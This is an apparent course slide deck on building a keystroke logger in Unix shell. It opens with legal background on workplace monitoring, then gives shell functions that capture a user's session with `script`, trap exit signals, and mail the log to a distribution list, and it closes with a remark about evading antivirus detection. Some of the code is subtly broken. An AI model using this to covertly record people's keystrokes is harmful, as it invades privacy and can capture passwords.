Creating a keystroke logger in unix shell scripting
Download as PPTX, PDF1 like11,906 views
The document provides code for creating a keylogger that records keystrokes to a log file, sets permissions on the log file, traps exit signals to email the log file, and includes notes about obtaining proper authorization before implementing keylogging software due to legal and ethical issues. It demonstrates how to write a basic keylogger script and includes considerations for making the keylogger covert to avoid antivirus detection.
![ Write the function:
create_log()
{
while [ -e $test_log_file ] # Checks for an existing file with the
name found in $log_file.
do # If $log_file is found, increment by one and try again.
attempt="$attempt+1"
test_log_file="$log_file""_$attempt"
done
log_file="$test_log_file"
touch $log_file # Once a viable filename has been found, this
file is created.
chmod 600 $log_file # Make $log_file writable for logging.
}](https://image.slidesharecdn.com/creatingakeystrokeloggerinunixshellscripting-130416113623-phpapp02/85/Creating-a-keystroke-logger-in-unix-shell-scripting-7-320.jpg)
![ Do the work
close_log()
{
if [ -e $log_file ] # Tests for the existence of $log_file.
then
echo "" >> $log_file
echo "****************************************" >> $log_file
echo "Logfile closing at $(date +%m%d%y%H%M%S)." >> $log_file # Adds final
date/time entry to log
else
echo "Test 3b"
echo "Logfile did not exist. No record of keystroke logging exists." >> $log_file # If log
does not exist, creates log and logs failure
echo "Created $log_file to report this error." >> $log_file
echo "Logfile created at $(date +%m%d%y%H%M%S)." >> $log_file
echo "Logfile will now close."
fi
chmod 400 $log_file # Guarantees log is left in read-only mode, even if trap triggered
during logging.
kill -9 > /dev/null # Guarantees ending of this process.
}](https://image.slidesharecdn.com/creatingakeystrokeloggerinunixshellscripting-130416113623-phpapp02/85/Creating-a-keystroke-logger-in-unix-shell-scripting-8-320.jpg)
![ Setup the cleanup routine so no logs are left behind on the system
being monitored
cleanup_exit () # This will do the cleanup execute and exit function.
{
# This function is executed on any type of exit except of course
# a kill -9, which cannot be trapped. The script log file is
# e-mailed either locally or remotely and the log file is
# compressed. The last "exit" is needed so the user does not
# have the ability to get to the command line without logging.
if [[ -s ${LOGDIR}/${LOGFILE} ]]
then
mailx -s "$TS - $LOGNAME Audit Report" $LOG_MANAGER
< ${LOGDIR}/${LOGFILE}
compress ${LOGDIR}/${LOGFILE} 2>/dev/null
fi
exit
}](https://image.slidesharecdn.com/creatingakeystrokeloggerinunixshellscripting-130416113623-phpapp02/85/Creating-a-keystroke-logger-in-unix-shell-scripting-11-320.jpg)
![ Declare the variables
TS=$(date +%m%d%y%H%M%S) # File time stamp
THISHOST=$(hostname|cut -f1-2 -d.) # This is the host name of this
machine
LOGDIR=/home/ganesh/other/logger_files # Log files are saved on the
logger files
# automatically and also
# This is the path that hold to the logs
LOGFILE=${THISHOST}.${LOGNAME}.$TS # Creates the name of the
log file
touch $LOGDIR/$LOGFILE # Creates the actual file
set -o vi 2>/dev/null # Previous commands recall
# Set the command prompt
export PS1="[THISHOST]@"'$PWD> '](https://image.slidesharecdn.com/creatingakeystrokeloggerinunixshellscripting-130416113623-phpapp02/85/Creating-a-keystroke-logger-in-unix-shell-scripting-13-320.jpg)
Creating a keystroke logger in unix shell scripting
- 1. CIS 216 Dan Morrill Highline Community College
- 2. While most companies will purchase software to do keystroke logging sometimes based on a court order, or a request/order from the legal department, or other party in the company, a system admin will be asked to record the keystrokes of an employee. Keystroke Loggers are Illegal? Not Necessarily – companies can and often do keystroke log their employees Courts in some jurisdictions have declined to take the step to prohibit the surreptitious use of keyloggers, despite the apparent option to apply state legislation. This posture leaves individuals vulnerable to having their private information exploited by their employers. Given alternative methods of surveillance, lack of federal regulation, and advancing technology, extending state statutes is necessary and just. (Harvard Law, 2012)
- 3. Keylogging - Employers sometimes install keylogging programs that record every single keystroke you use on your computer. This allows them to see everything you are typing, including your passwords. The Stored Communication Act and Federal Wiretap Act, along with some state laws may offer limited protection, but so far most employers are getting away with this intrusive practice. Email monitoring - Many companies have written policies saying the company can monitor your email. That means that they may look at your personal emails sent on company computers and devices, even if you used your personal email address. Website monitoring - Your employer is almost certainly monitoring your internet usage. That means if you're checking out porn sites, visiting YouTube, updating Facebook, or doing your holiday shopping, your employer will know about it. You may be violating a company Internet usage policy. If you aren't working the hours you're paid for, the employer may well discipline you for your Internet usage. (AOL, 2012)
- 4. The Fourth Amendment applies whenever the government — whether local, state or federal — conducts a search or seizure. It protects you from an unreasonable search or seizure by any government official or agent, not just the police. The Fourth Amendment does not protect you from privacy invasions by people other than the government, even if they later hand over what they found to the government — unless the government directed them to search your things in the first place. (EFF, 2006)
- 5. The most common methods used to construct keylogging software are as follows: A system hook which intercepts notification that a key has been pressed (installed using WinAPI SetWindowsHook for messages sent by the window procedure. It is most often written in C); A cyclical information keyboard request from the keyboard (using WinAPI Get(Async)KeyState or GetKeyboardState – most often written in Visual Basic, sometimes in Borland Delphi); Using a filter driver (requires specialized knowledge and is written in C). (SecureList, 2007)
- 6. Declare the variables: log_dir=/home/ current_user=$(whoami) log_time=$(date +%m%d%y%H%M%S) log_file="current_user$log_time" attempt="0" test_log_file="$log_file"
- 7. Write the function: create_log() { while [ -e $test_log_file ] # Checks for an existing file with the name found in $log_file. do # If $log_file is found, increment by one and try again. attempt="$attempt+1" test_log_file="$log_file""_$attempt" done log_file="$test_log_file" touch $log_file # Once a viable filename has been found, this file is created. chmod 600 $log_file # Make $log_file writable for logging. }
- 8. Do the work close_log() { if [ -e $log_file ] # Tests for the existence of $log_file. then echo "" >> $log_file echo "****************************************" >> $log_file echo "Logfile closing at $(date +%m%d%y%H%M%S)." >> $log_file # Adds final date/time entry to log else echo "Test 3b" echo "Logfile did not exist. No record of keystroke logging exists." >> $log_file # If log does not exist, creates log and logs failure echo "Created $log_file to report this error." >> $log_file echo "Logfile created at $(date +%m%d%y%H%M%S)." >> $log_file echo "Logfile will now close." fi chmod 400 $log_file # Guarantees log is left in read-only mode, even if trap triggered during logging. kill -9 > /dev/null # Guarantees ending of this process. }
- 9. Trap the users input and create the log trap 'close_log; exit 0' 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 26 create_log script $log_file close_log exit
- 10. Setup reporting via e-mail as a distro list LOG_MANAGER="logman" # List to e-mail audit log Logman is the distro-email
- 11. Setup the cleanup routine so no logs are left behind on the system being monitored cleanup_exit () # This will do the cleanup execute and exit function. { # This function is executed on any type of exit except of course # a kill -9, which cannot be trapped. The script log file is # e-mailed either locally or remotely and the log file is # compressed. The last "exit" is needed so the user does not # have the ability to get to the command line without logging. if [[ -s ${LOGDIR}/${LOGFILE} ]] then mailx -s "$TS - $LOGNAME Audit Report" $LOG_MANAGER < ${LOGDIR}/${LOGFILE} compress ${LOGDIR}/${LOGFILE} 2>/dev/null fi exit }
- 12. Set the exit trap trap 'cleanup_exit' 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 26
- 13. Declare the variables TS=$(date +%m%d%y%H%M%S) # File time stamp THISHOST=$(hostname|cut -f1-2 -d.) # This is the host name of this machine LOGDIR=/home/ganesh/other/logger_files # Log files are saved on the logger files # automatically and also # This is the path that hold to the logs LOGFILE=${THISHOST}.${LOGNAME}.$TS # Creates the name of the log file touch $LOGDIR/$LOGFILE # Creates the actual file set -o vi 2>/dev/null # Previous commands recall # Set the command prompt export PS1="[THISHOST]@"'$PWD> '
- 14. Running parameters chmod 774 ${LOGDIR}/${LOGFILE} # giving full control/permission to for the owner & Group # and read and write permissons to the other. script ${LOGDIR}/${LOGFILE} # Start the script monitoring session chmod 774 ${LOGDIR}/${LOGFILE} # Set permission to read, write and execute for the owner and group # and read and write permission to other. cleanup_exit # Execute the cleanup and exit function
- 15. There is always more than one solution Sometimes you need to write a key logger that is required for work, and you will not want to trigger an Anti-virus/malware response Be careful – this is pretty cool, but leads to liability work if not suffencently covered by authorization from management
Editor's Notes
- #3: http://jolt.law.harvard.edu/digest/software/federal-and-state-wiretap-act-regulation-of-keyloggers-in-the-workplace
- #4: http://jobs.aol.com/articles/2012/12/09/employer-spy-workers-legally-snoop/
- #5: https://ssd.eff.org/book/export/html/16
- #6: http://www.securelist.com/en/analysis?pubid=204791931